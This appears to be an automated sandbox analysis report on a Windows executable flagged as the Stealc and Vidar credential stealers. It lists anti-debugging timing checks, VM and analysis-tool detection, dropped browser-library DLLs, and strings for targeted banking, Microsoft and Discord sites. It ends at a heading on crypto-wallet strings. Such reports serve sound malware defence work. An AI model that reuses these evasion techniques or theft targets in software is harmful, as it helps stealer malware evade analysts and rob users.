Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA2DA0 second address: FA2DA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA2DA6 second address: FA2DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA2DAF second address: FA2DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4A4CCE8426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FAF98D second address: FAF995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FAF995 second address: FAF9B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CCE8435h 0x00000007 jo 00007F4A4CCE8426h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FAF9B4 second address: FAF9B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FAF9B9 second address: FAF9ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A4CCE842Dh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 jp 00007F4A4CCE8426h 0x00000016 jno 00007F4A4CCE8426h 0x0000001c pop eax 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007F4A4CCE842Ah 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBEC71 second address: FBEC7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC04E6 second address: FC04F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F4A4CCE8426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC04F6 second address: FC0502 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC035D second address: FC039D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F4A4CCE8438h 0x00000010 ja 00007F4A4CCE8426h 0x00000016 jo 00007F4A4CCE8426h 0x0000001c ja 00007F4A4CCE8426h 0x00000022 popad 0x00000023 jg 00007F4A4CCE842Ah 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC039D second address: FC03A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC2C2C second address: FC2C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F4A4CCE842Ah 0x0000000b push edi 0x0000000c pop edi 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD288A second address: FD28AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CE02A32h 0x00000007 jns 00007F4A4CE02A26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD28AC second address: FD28E1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4A4CCE8426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d jmp 00007F4A4CCE8434h 0x00000012 jmp 00007F4A4CCE8433h 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD28E1 second address: FD290E instructions: 0x00000000 rdtsc 0x00000002 je 00007F4A4CE02A38h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F4A4CE02A30h 0x0000000f push esi 0x00000010 jmp 00007F4A4CE02A30h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD3107 second address: FD3111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD3111 second address: FD3147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A4CE02A32h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jmp 00007F4A4CE02A36h 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD3147 second address: FD3150 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD329B second address: FD32A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4A4CE02A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD32A5 second address: FD32B1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4A4CCE8426h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD32B1 second address: FD32F6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4A4CE02A37h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F4A4CE02A2Fh 0x0000000f jmp 00007F4A4CE02A2Bh 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jl 00007F4A4CE02A4Ah 0x0000001c jng 00007F4A4CE02A36h 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD32F6 second address: FD32FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD6312 second address: FD6316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD6316 second address: FD631C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD925B second address: FD925F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDB1DB second address: FDB1E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C702CA second address: 4C70305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c mov di, si 0x0000000f mov dx, cx 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 jmp 00007F4A4CE02A38h 0x0000001a mov ecx, 30982CC1h 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70305 second address: 4C70309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70309 second address: 4C7030F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C7030F second address: 4C7032A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4A4CCE8437h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C703D3 second address: 4C703D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C703D9 second address: 4C703DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70B7F second address: 4C70B85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70B85 second address: 4C70BBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4A4CCE842Ah 0x00000008 pop ecx 0x00000009 mov eax, ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f jmp 00007F4A4CCE842Ah 0x00000014 mov dword ptr [esp], ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F4A4CCE8437h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70BBF second address: 4C70BED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CE02A39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4A4CE02A2Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70BED second address: 4C70BF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D51A54 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D4F06E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: F75911 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B04910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00B04910
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00AFDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_00AFDA80
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00AFE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 1_2_00AFE430
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B03EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_00B03EA0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00AFF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00AFF6B0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00AF16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00AF16D0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00AFBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 1_2_00AFBE70
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 1_2_00B038B0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00AFED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 1_2_00AFED20
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B04570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 1_2_00B04570
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00AFDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00AFDE10
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00AF1160 GetSystemInfo,ExitProcess, 1_2_00AF1160
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: IECGIEBA.1.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: file.exe, file.exe, 00000001.00000002.2381306580.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: IECGIEBA.1.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: IECGIEBA.1.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: IECGIEBA.1.dr Binary or memory string: discord.comVMware20,11696487552f
Source: IECGIEBA.1.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: IECGIEBA.1.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, 00000001.00000002.2380756269.00000000007C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2380756269.0000000000791000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: IECGIEBA.1.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: IECGIEBA.1.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: IECGIEBA.1.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: IECGIEBA.1.dr Binary or memory string: global block list test formVMware20,11696487552
Source: IECGIEBA.1.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: file.exe, 00000001.00000002.2380756269.0000000000768000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware=z
Source: IECGIEBA.1.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: IECGIEBA.1.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: IECGIEBA.1.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: IECGIEBA.1.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: IECGIEBA.1.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: IECGIEBA.1.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: IECGIEBA.1.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: IECGIEBA.1.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: IECGIEBA.1.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: IECGIEBA.1.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: IECGIEBA.1.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: IECGIEBA.1.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: file.exe, 00000001.00000002.2380756269.0000000000768000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: IECGIEBA.1.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: IECGIEBA.1.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: IECGIEBA.1.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: IECGIEBA.1.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: IECGIEBA.1.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: IECGIEBA.1.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000001.00000002.2381306580.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: IECGIEBA.1.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: IECGIEBA.1.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CB05FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 1_2_6CB05FF0
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00AF45C0 VirtualProtect ?,00000004,00000100,00000000 1_2_00AF45C0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B09860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00B09860
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B09750 mov eax, dword ptr fs:[00000030h] 1_2_00B09750
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B078E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA, 1_2_00B078E0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CADB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_6CADB66C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CADB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_6CADB1F7
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 5948, type: MEMORYSTR
Searches for specific processes (likely to inject)
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B09600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 1_2_00B09600
Source: file.exe Binary or memory string: e-vProgram Manager
Source: file.exe, 00000001.00000002.2381306580.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: vProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CADB341 cpuid 1_2_6CADB341
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 1_2_00B07B90
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B07980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 1_2_00B07980
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B07850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 1_2_00B07850
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B07A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 1_2_00B07A30

Stealing of Sensitive Information
barindex
Yara detected Stealc
Source: Yara match File source: 1.2.file.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2380756269.0000000000768000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.2149042786.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2380969091.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 5948, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 5948, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
